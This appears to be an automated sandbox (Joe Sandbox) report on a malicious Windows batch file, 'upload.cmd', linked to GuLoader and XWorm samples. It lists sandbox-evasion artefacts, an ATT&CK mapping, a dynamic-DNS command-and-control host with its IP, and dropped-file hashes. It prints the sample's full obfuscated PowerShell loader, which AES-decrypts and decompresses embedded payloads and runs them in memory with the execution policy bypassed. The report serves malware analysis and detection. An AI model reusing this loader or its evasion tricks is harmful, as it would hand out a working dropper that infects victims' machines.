      Source: Amcache.hve.5.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.5.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: wermgr.exe, 0000000C.00000003.3315552228.000002C210855000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000003.3315706036.000002C21085C000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3316691808.000002C21085D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWe
      Source: wermgr.exe, 0000000C.00000003.3315552228.000002C210855000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000003.3315706036.000002C21085C000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3316691808.000002C21085D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
      Source: Amcache.hve.5.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: wermgr.exe, 0000000C.00000002.3316550354.000002C210807000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW@1
      Source: Amcache.hve.5.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.5.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.5.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.dr; Binary or memory string: vmci.sys
      Source: Amcache.hve.5.dr; Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.5.dr; Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.5.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.dr; Binary or memory string: VMware20,1
      Source: Amcache.hve.5.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.5.dr; Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.5.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.5.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.5.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.5.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.5.dr; Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.5.dr; Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.5.dr; Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.5.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.5.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match; File source: amsi64_5212.amsi.csv, type: OTHER
      Source: Yara match; File source: \Device\ConDrv, type: DROPPED
      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzmoooy2kqgkiwy4rorfj6iiwcpdkf2hw9dvyzhqs4e='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('au8minhry/rn0xwxzshhqq=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gkmlj=new-object system.io.memorystream(,$param_var); $cuzzm=new-object system.io.memorystream; $xkhtn=new-object system.io.compression.gzipstream($gkmlj, [io.compression.compressionmode]::decompress); $xkhtn.copyto($cuzzm); $xkhtn.dispose(); $gkmlj.dispose(); $cuzzm.dispose(); $cuzzm.toarray();}function execute_function($param_var,$param2_var){ $dumer=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $qdtaj=$dumer.entrypoint; $qdtaj.invoke($null, $param2_var);}$eqnwc = 'c:\users\user\desktop\upload.cmd';$host.ui.rawui.windowtitle = $eqnwc;$jwnva=[system.io.file]::('txetlladaer'[-1..-11] -join '')($eqnwc).split([environment]::newline);foreach ($ghmic in $jwnva) { if ($ghmic.startswith('oydvwzhhegvkfmqgimzx')) { $pfglm=$ghmic.substring(20); break; }}$payloads_var=[string[]]$pfglm.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 21 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph ID: 1446790 | Sample: upload.cmd | Startdate: 23/05/2024 | Architecture: WINDOWS | Score: 84
• Sample-level signatures: Snort IDS alert for network traffic; Yara detected Powershell decode and execute; Sigma detected: Invoke-Obfuscation CLIP+ Launcher; 2 other signatures
• xgmn934.duckdns.org: Uses dynamic DNS services
• cmd.exe started; signatures: Suspicious powershell command line found; Obfuscated command line found; Bypasses PowerShell execution policy
• cmd.exe started powershell.exe, conhost.exe, cmd.exe and cmd.exe
• powershell.exe: connected to xgmn934.duckdns.org (12.202.180.134, 49705 -> 8896, FISERV-INCUS, United States); dropped \Device\ConDrv (ASCII); started wermgr.exe

Source | Detection | Scanner | Label
upload.cmd | 3% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xgmn934.duckdns.org | 12.202.180.134 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://upx.sf.net | Amcache.hve.5.dr | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
12.202.180.134 | xgmn934.duckdns.org | United States | 22983 | FISERV-INCUS | true
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446790
        Start date and time:2024-05-23 21:12:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 42s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:upload.cmd
        Detection:MAL
        Classification:mal84.troj.evad.winCMD@9/9@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Override analysis time to 240s for powershell
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.189.173.20
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
        • VT rate limit hit for: upload.cmd
Time | Type | Description
15:12:59 | API Interceptor | 6714071x Sleep call for process: powershell.exe modified
15:16:10 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
Match: 12.202.180.134 (Associated Sample Name / URL | Detection | Threat Name)
• xff.cmd | malicious | GuLoader, XWorm
• zap.cmd | malicious | Unknown
• zap.cmd | malicious | GuLoader, XWorm
• update.cmd | malicious | Unknown
• xff.cmd | malicious | AsyncRAT, GuLoader
• new.cmd | malicious | GuLoader
• las.cmd | malicious | GuLoader
• kam.cmd | malicious | Unknown
• sample.cmd | malicious | Unknown
• zap.cmd | malicious | GuLoader, XWorm
Match: xgmn934.duckdns.org (Associated Sample Name / URL | Detection | Threat Name | Context)
• zap.cmd | malicious | GuLoader, XWorm | 12.202.180.134
• new.cmd | malicious | GuLoader | 12.202.180.134
• zap.cmd | malicious | GuLoader, XWorm | 12.202.180.134
• update.vbs | malicious | GuLoader, XWorm | 12.202.180.134
Match: FISERV-INCUS (Associated Sample Name / URL | Detection | Threat Name | Context)
• xff.cmd | malicious | GuLoader, XWorm | 12.202.180.134
• zap.cmd | malicious | Unknown | 12.202.180.134
• zap.cmd | malicious | GuLoader, XWorm | 12.202.180.134
• update.cmd | malicious | Unknown | 12.202.180.134
• xff.cmd | malicious | AsyncRAT, GuLoader | 12.202.180.134
• new.cmd | malicious | GuLoader | 12.202.180.134
• las.cmd | malicious | GuLoader | 12.202.180.134
• kam.cmd | malicious | Unknown | 12.202.180.134
• sample.cmd | malicious | Unknown | 12.202.180.134
• zap.cmd | malicious | GuLoader, XWorm | 12.202.180.134
                            No context
                            No context
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.5190904443757718
                            Encrypted:false
                            SSDEEP:96:+NuFnALjdhxrxYid0RH3Uje0eu/RoJV1QXIGZAX/d5FMT2SlPkpXmTAUf/VXT5Nr:rwzxmG0R30h/AzuiFyZ24lO8
                            MD5:3794947807DA48B2A3EB91A6F8937139
                            SHA1:2D02D90CB72B98AC766563410E84AE63DC92D186
                            SHA-256:F1A5C0836A72EB0B75CE0D7B749D2AD5E47DEC3CF56BCD05466D9964F72DE55D
                            SHA-512:26EA2A8160A6F66D57CED41617560E998FDDF394C658B31EB1DF5654974285BC7432D6C61E646520CBABA15283A9C8D93AE2C9C51614B3998C64BD6A9AD98443
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.4.3.0.5.2.2.5.3.6.6.9.1.0.7.4.8.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.5.3.6.3.7.4.8.7.6.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.c.d.7.0.0.7.-.c.a.f.f.-.4.9.8.1.-.8.5.5.f.-.0.a.1.4.e.4.4.e.5.1.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.c.-.0.0.0.1.-.0.0.1.4.-.e.6.8.5.-.a.7.3.8.4.5.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):7200
                            Entropy (8bit):3.684418552616875
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbk7QCDjyje6YQJvBggmfHNGfQiN5aMZAltm:R6l7wVeJk7dma6YQJ5ggmftW1pStm
                            MD5:1AD7BCDE9A76B61F2263BE3720BEFD06
                            SHA1:9C7D64F2A10A82B5D204A26E2F959B924789BB17
                            SHA-256:C3F048953744E4FC82B217635C4B5DB643A24631617712D7C7DEF66F4D058034
                            SHA-512:650687C133B68C0116D6EA8BA45EA7D0E483B787F9483949709233157D644F5F7A06454D7AE2079A9C9310D2553639DF7D58CA31237A3C5DF1DA19E96E6B294F
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.1.2.<./.P.i.
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4691
                            Entropy (8bit):4.511006018222363
                            Encrypted:false
                            SSDEEP:96:uIjfYI7P27V0JFKlEFBfFqWTXFBfF4EmufNd:uIEYP27i4I+Emufj
                            MD5:53A83207A5AEAB629FBD315DF5003A10
                            SHA1:8FB07F25BA5C84118573D1FA770B93D234C14C61
                            SHA-256:6B39EB068247D43744BC725E6A542FADAA80630C479477E71D87633E865C630A
                            SHA-512:258687B373B87ECED6F8F1D9F7088F0D381DE2A63C2D4DB485CF0934C3050C359538087DCF17F3BC63AC78F87651FAD2D1FE1A5A24780BA8D3459B194B0BCFEA
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336138" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Reputation:low
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3056
                            Entropy (8bit):5.465515946139154
                            Encrypted:false
                            SSDEEP:48:CAzsSU4y4RQmFoUeCamfm9qr9t5/78NKRwS4GxJZKaVEouYAgwd64rHLjtv5/G+v:CAzlHyIFKL2O9qrh7KKRwSJ5Eo9Adrxj
                            MD5:2E5BCE07104547FE87397C8EAA3BA817
                            SHA1:A2F2D555B3C08681427546C57E311E802A4F8025
                            SHA-256:9DF2A6BDD89423BBC9661A09C46FC35E8626F525E7DA41B9D1286AB75835931E
                            SHA-512:FBB8063CD45BA3009CBF170E6CF6DADA809D0D9E6849FE0BA2C93AE9E0692BEF5BB2A8605C8B41E595ACE541D02F3618332FB408461D51D1519C9CAE0BDC0155
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.372872817980425
                            Encrypted:false
                            SSDEEP:6144:AFVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguN/iL:YV1qyWWI/glMM6kF7tq
                            MD5:F02B6AC66F526D494D0AB0A981157BC9
                            SHA1:5BB8554058457D199741242223EBFDA6D3DD47E8
                            SHA-256:733BC98A9DB6D2B474C66A679BE67462A3F92E7FE79F93E269F48EF9BFA75238
                            SHA-512:1D46E8A22A4C3595BB058771A4AEC22100A0DDAB57AC8DF10EEB981A5A7E448BC7711786AC5478B4C2221CC51D08ED4F9E8A5D43A09877CCD43BD686E3A50E5D
                            Malicious:false
                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.[.E..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (1906), with CRLF line terminators
